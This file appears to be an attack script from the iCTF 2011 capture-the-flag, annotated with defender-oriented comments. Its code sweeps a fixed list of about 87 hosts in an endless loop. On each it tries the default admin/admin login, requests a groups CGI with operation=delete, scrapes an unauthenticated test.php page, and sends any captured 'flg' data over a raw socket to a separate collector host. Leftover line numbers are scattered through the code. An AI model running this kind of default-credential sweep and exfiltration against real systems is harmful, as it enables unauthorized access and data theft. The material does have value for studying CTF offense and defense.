ctf-2011

old assets from capture-the-flag ictf 2011


ex-mulemanager-admin.py



      1 #!/usr/bin/env python
      2 import socket
      3 import re
      4 import mechanize
      5 import urllib2
      6 import httplib
      7 
def do(host):
    """Check one host for the stock admin account and read the groups CGI.

    Steps, all over plain HTTP against ``host``:
      1. load /login.php and select the first form on the page,
      2. submit it with username 'admin' / password 'admin',
      3. if the response lacks the invalid-credentials error, request
         /~muleadmin/cgi-bin/groups?operation=delete with the same
         Browser instance.

    Returns the CGI response body when it contains the substring 'flg'
    (presumably the flag marker of this CTF -- not shown here), otherwise
    ''. URL errors and malformed HTTP status lines also yield ''.

    Defender's view: the whole path depends on the shipped admin/admin
    password still being accepted. Once it is changed, and assuming the
    app reports the failure with the error string tested below, the
    function stops at the 'does not work' branch. In web logs it appears
    as a login-form submission followed directly by a request to the
    groups CGI from the same client.
    """
    try:
        base_url = "http://" + host
        browser = mechanize.Browser()
        browser.open(base_url + "/login.php", timeout=3.0)

        # Bare except kept from the original: any failure to select the
        # first form is treated as "this page has no login form".
        try:
            browser.select_form(nr=0)
        except:
            print('Did not find form')
            return ''

        # Vendor-default credentials; nothing is guessed or iterated.
        browser.form['username'] = 'admin'
        browser.form['password'] = 'admin'
        browser.submit()

        login_reply = browser.response().read()
        if 'ERROR: Invalid username and/or password.' in login_reply:
            # does not work here
            print('Default admin login does not work')
            return ''

        print('Default admin login worked')

        # Same Browser object as the login, so it reuses whatever session
        # state the login produced. Whether the CGI checks that state, and
        # what operation=delete does server-side, is not visible here.
        browser.open(base_url + '/~muleadmin/cgi-bin/groups?operation=delete', timeout=5.0)
        cgi_body = browser.response().read()

        return cgi_body if 'flg' in cgi_body else ''
    except (urllib2.URLError, httplib.BadStatusLine):
        # Unreachable host or broken HTTP reply: report "nothing found".
        return ''
     41 
def do_more(host):
    """Fetch /test.php from ``host`` without logging in and look for 'flg'.

    Returns the page body when it contains the substring 'flg', otherwise
    ''. URL errors and malformed HTTP status lines also yield ''.

    Defender's view: no credentials are sent, so any hit means a test page
    left in the deployed web root is serving sensitive data to anonymous
    clients. Removing such pages from the document root closes this path.
    """
    try:
        browser = mechanize.Browser()
        browser.open("http://" + host + "/test.php", timeout=3.0)
        page = browser.response().read()

        if 'flg' not in page:
            return ''

        print('test.php had flags')
        return page
    except (urllib2.URLError, httplib.BadStatusLine):
        # Unreachable host or broken HTTP reply: report "nothing found".
        return ''
     57 
# Endless sweep over a fixed list of 10.13.x.3 addresses. Each host gets both
# checks (default admin login + groups CGI, then /test.php). Any non-empty
# result is reported over TCP to 10.13.147.24:2324, presumably the team's flag
# collector (not shown here), as three newline-terminated fields: host,
# service name, captured text with its newlines stripped.
#
# Defender's view: every pass repeats the same request sequence per host with
# no delay between passes, so the source address stands out in access logs as
# a periodic /login.php -> groups CGI -> /test.php pattern.
#
# NOTE(review): only urllib2.URLError and httplib.BadStatusLine are handled in
# the helpers and nothing is handled here, so any other exception ends the
# loop. The reporting socket is never explicitly closed.
while True:
    for host in [
        '10.13.136.3', '10.13.145.3', '10.13.188.3', '10.13.179.3',
        '10.13.157.3', '10.13.155.3', '10.13.190.3', '10.13.148.3',
        '10.13.208.3', '10.13.213.3', '10.13.165.3', '10.13.176.3',
        '10.13.211.3', '10.13.194.3', '10.13.185.3', '10.13.196.3',
        '10.13.129.3', '10.13.215.3', '10.13.146.3', '10.13.151.3',
        '10.13.202.3', '10.13.139.3', '10.13.174.3', '10.13.142.3',
        '10.13.198.3', '10.13.181.3', '10.13.206.3', '10.13.150.3',
        '10.13.168.3', '10.13.184.3', '10.13.169.3', '10.13.199.3',
        '10.13.135.3', '10.13.141.3', '10.13.177.3', '10.13.153.3',
        '10.13.187.3', '10.13.138.3', '10.13.152.3', '10.13.166.3',
        '10.13.143.3', '10.13.134.3', '10.13.163.3', '10.13.205.3',
        '10.13.186.3', '10.13.156.3', '10.13.180.3', '10.13.133.3',
        '10.13.193.3', '10.13.195.3', '10.13.154.3', '10.13.200.3',
        '10.13.175.3', '10.13.131.3', '10.13.170.3', '10.13.167.3',
        '10.13.162.3', '10.13.173.3', '10.13.212.3', '10.13.207.3',
        '10.13.171.3', '10.13.164.3', '10.13.140.3', '10.13.214.3',
        '10.13.191.3', '10.13.161.3', '10.13.192.3', '10.13.178.3',
        '10.13.137.3', '10.13.210.3', '10.13.159.3', '10.13.158.3',
        '10.13.189.3', '10.13.172.3', '10.13.182.3', '10.13.149.3',
        '10.13.130.3', '10.13.183.3', '10.13.203.3', '10.13.147.3',
        '10.13.160.3', '10.13.204.3', '10.13.144.3', '10.13.197.3',
        '10.13.132.3', '10.13.209.3', '10.13.201.3',
    ]:
        print('trying ' + host)
        flags = do(host)
        flags += do_more(host)

        # Both helpers return '' on a miss, so an empty string means there
        # is nothing to report for this host.
        if not flags:
            continue

        print('sending flags...')
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect(('10.13.147.24', 2324))
        sock.send(host + '\n')
        sock.send('mulemanager\n')
        # Collapse the captured text onto one line before sending it.
        sock.send(flags.replace('\n', '') + '\n')
        print(sock.recv(1024))
     72